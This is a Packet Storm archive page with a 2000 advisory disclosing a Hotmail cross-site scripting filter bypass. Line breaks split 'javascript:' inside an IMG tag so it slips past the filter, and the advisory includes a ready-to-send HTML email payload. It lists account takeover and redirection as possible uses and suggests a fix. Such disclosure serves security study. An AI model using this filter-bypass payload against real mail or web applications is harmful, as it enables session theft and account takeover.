exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

hack-hm-1.0.txt

hack-hm-1.0.txt
Posted Nov 22, 2001
Authored by Hawaiian Superman

Hotmail is vulnerable to yet another serious security problem involving javascript. Windows, MacOS, and Linux users are affected. Filters may be bypassed by putting line feeds in the middle of the javascript code, the browser will remove the line feeds and execute it.

tags | exploit, javascript
systems | linux, windows
SHA-256 | 38d619755398daddb4094c74d9e46a705ebf54917924ac7f57da9be93f94b110

hack-hm-1.0.txt

Change Mirror Download
Sure:

####################[Title]####################
Hotmail Security Alert (Hack HM1.0)! 5/10/2000
By: Da Hawaiian HaXorS
"Give back da aina!"

####################[Disclaimer]####################
In no event shall Da Hawaiian HaXorS be held liable for any special, indirect
or
consequential damages or any damages whatsoever resulting from loss of use,

data or profits, whether in an action of contract, negligence or other
action, arising out of or in connection with the use or performance
of this information.

In Short, we take no responsibility for the information within this document.
The information contained within is our sole opinion and not the responsibility
or opinion of any party we are affiliated with. Whatever anyone does with
this information is entirely of their own accord.

Lastly, anyone currently employed by any county, state, or federal law enforcement
agency is not allow to posses or read this material by command of the authors.
This is for the security community, not for legislative muscle. So DELETE
IT FOOL!
end rant.

####################[Introduction]####################
This document for written to bring attention to security flaws within the
Microsoft Hotmail email system. As we have seen dozens of times
before, javascript poses a security danger to web applications, especially
when
not properly protected.

Also, I must note that the recent security hole posting on
http://www.peacefire.org/security/fakemailform/
IS NOT A HACK. Just tricking the user.

####################[Scope]####################
The scope of this problem will most likely affect any and all browsers that
have javascript turned on by default. Now lets see here....

That covers all major operating systems. (Windows, MacOS, *nix)
and covers both major browsers. (Internet Explorer 3,4,5 and Netscape 2,
3,4 and 5!?)

So we can safely assume everyone who currently uses Hotmail is at risk regardless
of
their current software. Unless there are a few die-hards who use lynx to
check
thier hotmail account.


####################[Detailed Exploit]####################
The following line will execute a line of JavaScript Code. This
browser feature has been well documented elsewhere.

<IMG SRC="javascript:alert('GameOver, Hax0rs win!');"> /* Example, not
actual exploit */

MS Hotmail attempts to filter this type of attack by search and replace.
However, interesting results are noticed when the string is broken up by
a few multiple
line breaks.

/* Actual Exploit */
<IMG SRC="java

scri


pt:alert('GameOver, Hax0rs win!');">

Seems that the line breaks makes it possible to bypass the filters, yet
is still
executed within the browser.

For the script kiddy: (You must send the mail as HTML mail).

MIME-Version: 1.0
From: Script Kiddy <scriptkiddy@wannabe.com>
Content-Type: text/html; charset=us-ascii
Content-Transfer-Encoding: 7bit
Subject: The Script Kiddy Has You OWNED!

<HTML><BODY>
<IMG SRC="java

scri


pt:alert('GameOver, Hax0rs win!');">
</BODY></HTML>
>.

/* J0l0S2h8fj8i0Ce2ahe027 */

####################[Potential Disasters]####################
The limit to the disastrous consequences of this are limited only to the
skill
and creativity of intruder. So, lets give some examples shall we:

1) Hotmail Account take over. Yes, attacker can gain both username and password
or whatever Hotmail uses to track the session. Not like it matters.

2) Use exploit in conjunction with a KNOWN browser exploits to access the
system.
Hmm. I wonder if JS can be used to exploit an IE security bug, writing a
file
to the system (Can you say "I LOVE YOU"?), and then execute that file. Seems
possible.

3) Re-Direct the user to somewhere else they want.
Wow, wouldn't spammers just love to be able to re-direct a massive amount
of
Hotmail users to some Pr0n site. HAH!

Remember, limited only in creativity.

####################[Suggested Fix]####################
The silver bullet fix would be that Microsoft would take security and the
privacy of its customers seriously with a proactive approach rather than
deny
and post a patch approach.

However, given that is an unreasonable request, we suggest the following:
Removethe ALL carriage returns from string before analyzing it.


--end

Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    18 Files
  • 19
    Nov 19th
    7 Files
  • 20
    Nov 20th
    13 Files
  • 21
    Nov 21st
    6 Files
  • 22
    Nov 22nd
    48 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    60 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    44 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close